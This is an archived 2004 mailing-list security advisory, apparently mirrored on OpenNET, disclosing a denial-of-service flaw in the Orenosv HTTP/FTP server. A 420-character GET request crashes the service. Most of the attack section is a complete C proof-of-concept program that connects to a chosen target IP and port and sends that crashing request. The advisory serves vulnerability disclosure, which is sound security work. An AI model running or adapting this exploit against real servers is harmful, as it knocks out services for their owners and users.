The OpenNET Project
 
Search (keywords):  SOFT ARTICLES TIPS & TRICKS SECURITY
LINKS NEWS MAN DOCUMENTATION


Orenosv HTTP/FTP Server Denial Of Service


<< Previous INDEX Search src Set bookmark Go to bookmark Next >>
Date: Tue, 25 May 2004 23:48:52 -0400 (EDT)
From: badpack3t <[email protected]>
To: [email protected]
Subject: Orenosv HTTP/FTP Server Denial Of Service

------=_20040525234852_95297
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 8bit

Please publish:

http://security-protocols.com/modules.php?name=News&file=article&sid=1987

Or the attached advisory.

Thanks,

----------------------------------------
badpack3t
www.security-protocols.com
----------------------------------------

------=_20040525234852_95297
Content-Type: text/plain; name="sp-x13-advisory.txt"
Content-Transfer-Encoding: 8bit
Content-Disposition: attachment; filename="sp-x13-advisory.txt"

SP Research Labs Advisory x13
-----------------------------

Orenosv HTTP/FTP Server Denial Of Service
-----------------------------------------

Versions:
orenosv059f

Vendor:
http://hp.vector.co.jp/authors/VA027031/orenosv/index_en.html

Date Released - 5.25.2004

------------------------------------
Product Description from the vendor:

Orenosv is an HTTP/FTP/FTPS server running on Windows NT 4.0, Windows 2000 and Windows XP platforms.
Orenosv is a freely distributable software.

--------
Details:

A specifically crafted HTTP GET request which contains 420 A's will cause the HTTP and FTP service
to stop responding.  

--------
Exploit:

Attached to this advisory is very basic PoC code which only causes the orenosv service to crash.

--------------
Tested on: 
WindowsXP SP1

peace out,

--------------------------
badpack3t
www.security-protocols.com
--------------------------

/****************************/
   PoC to crash the server
/****************************/

/* Orenosv HTTP/FTP Server Denial Of Service
   
   Version:
   orenosv059f
  
   Vendor:
   http://hp.vector.co.jp/authors/VA027031/orenosv/index_en.html

   Coded and Discovered by:
   badpack3t <[email protected]>
   .:sp research labs:.
   www.security-protocols.com
   5.25.2004
 */

#include <winsock2.h>
#include <stdio.h>

#pragma comment(lib, "ws2_32.lib")

char exploit[] = 

/* 420 A's - looks ugly but owell */
"GET /AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.0\r\n\r\n"; 

int main(int argc, char *argv[])
{
	WSADATA wsaData;
	WORD wVersionRequested;
	struct hostent  *pTarget;
	struct sockaddr_in 	sock;
	char *target;
	int port,bufsize;
	SOCKET mysocket;
	
	if (argc < 2)
	{
		printf("Orenosv HTTP/FTP Server DoS by badpack3t\r\n\r\n", argv[0]); 
		printf("Usage:\r\n %s <targetip> [targetport] (default is 9999)\r\n\r\n", argv[0]);
		printf("www.security-protocols.com\r\n\r\n", argv[0]);
		exit(1);
	}

	wVersionRequested = MAKEWORD(1, 1);
	if (WSAStartup(wVersionRequested, &wsaData) < 0) return -1;

	target = argv[1];
	port = 9999;

	if (argc >= 3) port = atoi(argv[2]);
	bufsize = 1024;
	if (argc >= 4) bufsize = atoi(argv[3]);

	mysocket = socket(AF_INET, SOCK_STREAM, 0);
	if(mysocket==INVALID_SOCKET)
	{	
		printf("Socket error!\r\n");
		exit(1);
	}

	printf("Resolving Hostnames...\n");
	if ((pTarget = gethostbyname(target)) == NULL)
	{
		printf("Resolve of %s failed\n", argv[1]);
		exit(1);
	}

	memcpy(&sock.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length);
	sock.sin_family = AF_INET;
	sock.sin_port = htons((USHORT)port);

	printf("Connecting...\n");
	if ( (connect(mysocket, (struct sockaddr *)&sock, sizeof (sock) )))
	{
		printf("Couldn't connect to host.\n");
		exit(1);
	}

	printf("Connected!...\n");
	printf("Sending Payload...\n");
	if (send(mysocket, exploit, sizeof(exploit)-1, 0) == -1)
	{
		printf("Error Sending the Exploit Payload\r\n");
		closesocket(mysocket);
		exit(1);
	}

	printf("Payload has been sent! Check if the webserver is dead.\r\n");
	closesocket(mysocket);
	WSACleanup();
	return 0;
}
------=_20040525234852_95297--

<< Previous INDEX Search src Set bookmark Go to bookmark Next >>



Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2025 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру